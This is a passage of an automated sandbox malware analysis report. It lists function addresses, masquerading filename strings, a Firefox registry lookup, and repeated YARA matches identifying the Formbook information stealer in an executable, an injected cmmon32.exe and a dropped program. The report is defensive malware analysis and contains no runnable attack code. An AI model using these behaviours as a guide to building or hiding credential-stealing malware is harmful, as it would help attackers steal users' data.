          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_0041CEEE2_2_0041CEEE
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_00409F602_2_00409F60
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_00409F1A2_2_00409F1A
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_0041D7302_2_0041D730
          Source: C:\Users\user\Desktop\168768566-104646-sdfnt5-8.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_050525194_2_05052519
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_05041D1B4_2_05041D1B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0502C53F4_2_0502C53F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB547E4_2_04FB547E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0504E5814_2_0504E581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0504D5D24_2_0504D5D2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0503FDDB4_2_0503FDDB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_05031DE34_2_05031DE3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FA14104_2_04FA1410
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04F9740C4_2_04F9740C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0503F42B4_2_0503F42B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_050434904_2_05043490
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_05051C9F4_2_05051C9F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04F80D404_2_04F80D40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FA15304_2_04FA1530
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_050444EF4_2_050444EF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_050517464_2_05051746
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_050427824_2_05042782
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB5E704_2_04FB5E70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB4E614_2_04FB4E61
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FA76404_2_04FA7640
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_05051FCE4_2_05051FCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB66114_2_04FB6611
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0504CE664_2_0504CE66
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FA57904_2_04FA5790
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_05043E964_2_05043E96
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_050526F84_2_050526F8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB48CB4_2_04FB48CB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04F9A0804_2_04F9A080
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB10704_2_04FB1070
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0505D9BE4_2_0505D9BE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB00214_2_04FB0021
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FBE0204_2_04FBE020
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_050519E24_2_050519E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0504D0164_2_0504D016
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB61804_2_04FB6180
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB594B4_2_04FB594B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_050318B64_2_050318B6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB71104_2_04FB7110
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_050528E84_2_050528E8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FA42B04_2_04FA42B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB4A5B4_2_04FB4A5B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB523D4_2_04FB523D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_05040A024_2_05040A02
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_0505E2144_2_0505E214
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04F8EBE04_2_04F8EBE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB63C24_2_04FB63C2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FB4B964_2_04FB4B96
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_05051A994_2_05051A99
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_04FAFB404_2_04FAFB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_050522DD4_2_050522DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F4CBC44_2_02F4CBC4
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F4C9FB4_2_02F4C9FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F4D1BD4_2_02F4D1BD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F4CEEE4_2_02F4CEEE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F32FB04_2_02F32FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F39F604_2_02F39F60
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F4D7304_2_02F4D730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F39F1A4_2_02F39F1A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4_2_02F32D904_2_02F32D90
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1C04018_2_00C1C040
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1315018_2_00C13150
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C172F018_2_00C172F0
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1223318_2_00C12233
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C157F118_2_00C157F1
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1BB3F18_2_00C1BB3F
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C10F7818_2_00C10F78
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1C03118_2_00C1C031
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C151C118_2_00C151C1
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C151D018_2_00C151D0
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1314C18_2_00C1314C
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C172ED18_2_00C172ED
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1121018_2_00C11210
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C153C018_2_00C153C0
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C153BB18_2_00C153BB
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1047218_2_00C10472
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1C42918_2_00C1C429
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1C43818_2_00C1C438
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C166A318_2_00C166A3
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C166A818_2_00C166A8
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1564C18_2_00C1564C
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1565018_2_00C15650
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C15A9018_2_00C15A90
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C15AA018_2_00C15AA0
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C1CC7018_2_00C1CC70
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C10EE118_2_00C10EE1
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C13FD918_2_00C13FD9
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_00C13FE818_2_00C13FE8
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_072F962018_2_072F9620
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_072FA6E018_2_072FA6E0
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_072F929818_2_072F9298
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_072F7D4318_2_072F7D43
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_072FAA2018_2_072FAA20
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_072FA79718_2_072FA797
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_072F967818_2_072F9678
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_072F96BD18_2_072F96BD
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_072F52F018_2_072F52F0
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_072F2DA918_2_072F2DA9
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 18_2_072F2DB818_2_072F2DB8
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_0040103020_2_00401030
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_0041C9FB20_2_0041C9FB
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_0041D1BD20_2_0041D1BD
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_0041CBC420_2_0041CBC4
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_00402D9020_2_00402D90
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_0041CEEE20_2_0041CEEE
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_00409F6020_2_00409F60
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_00409F1A20_2_00409F1A
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_0041D73020_2_0041D730
          Source: C:\Program Files (x86)\Gilths\sxah0fixnx-4c.exeCode function: 20_2_00402FB020_2_00402FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04FDDDE8 appears 34 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 04F8B0E0 appears 168 times
          Source: 168768566-104646-sdfnt5-8.exeBinary or memory string: OriginalFilename vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000000.00000000.762313256.00000000000C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameServiceHost.dll8 vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000000.00000000.762313256.00000000000C2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHSDNvk.exeR vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exeBinary or memory string: OriginalFilename vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000002.00000002.829524567.0000000001A6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000002.00000000.770340960.0000000000DB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameServiceHost.dll8 vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000002.00000000.770340960.0000000000DB2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHSDNvk.exeR vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exe, 00000002.00000002.828055416.00000000017B0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exeBinary or memory string: OriginalFilenameServiceHost.dll8 vs 168768566-104646-sdfnt5-8.exe
          Source: 168768566-104646-sdfnt5-8.exeBinary or memory string: OriginalFilenameHSDNvk.exeR vs 168768566-104646-sdfnt5-8.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
          Source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.1140935876.0000000000C10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.1141596448.0000000001080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1187043673.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000012.00000002.1129295021.000000000416D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.827932427.0000000001780000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1192909040.0000000002F30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000014.00000002.1137802976.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.826682348.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.829690902.0000000001AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.774168913.0000000003E13000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.1143562745.0000000000960000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.168768566-104646-sdfnt5-8.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 20.2.sxah0fixnx-4c.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE